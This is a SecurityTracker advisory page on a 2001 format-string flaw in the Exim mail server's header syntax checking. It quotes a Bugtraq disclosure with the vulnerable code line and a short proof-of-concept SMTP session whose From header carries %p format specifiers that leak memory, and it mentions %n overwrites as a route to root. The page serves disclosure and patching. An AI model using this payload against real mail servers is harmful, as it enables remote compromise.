SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   Exim Vendors:   Exim.org
Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
SecurityTracker Alert ID:  1001694
SecurityTracker URL:  http://securitytracker.com/id/1001694
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 6 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Exim mail server that may allow a remote user to execute arbitrary code on the server.

It is reported that when Exim is configured to check incoming mail headers for proper syntax, the vulnerability can be triggered. This is configured through the /etc/exim.conf headers_check_syntax option. By default, this option is not set.

The vulnerability reportedly exists in the accept.c module where the moan_smtp_batch() function is called.

A demonstration exploit transcript is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with root-level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exim.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Releases Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Debian has released a fix.
(Conectiva Issues Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Conectiva has issued a fix.
(Red Hat Provides Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
Red Hat has provided a fix.



 Source Message Contents

Subject:  lil' exim format bug


Hi BugTrackers

Just a little bug to tell:


THE BUG
-------

accept.c, line 2506:
	else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:
	moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains format strings, it get transformed by
moan_smtp_batch().


Why I said that it's a little bug?
----------------------------------

This piece of code is only executed when exim is configured to check incoming mails' headers:
/etc/exim.conf should have an option set:
headers_check_syntax

By default it's turned OFF.
only few ppl turn it on.

So it's NOT vulnerable BY DEFAULT.


Exploitation:
-------------

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get
 root out of this bug.

No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man.
-- 
Megyer Laszlo (Lez)
lez@sch.bme.hu


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC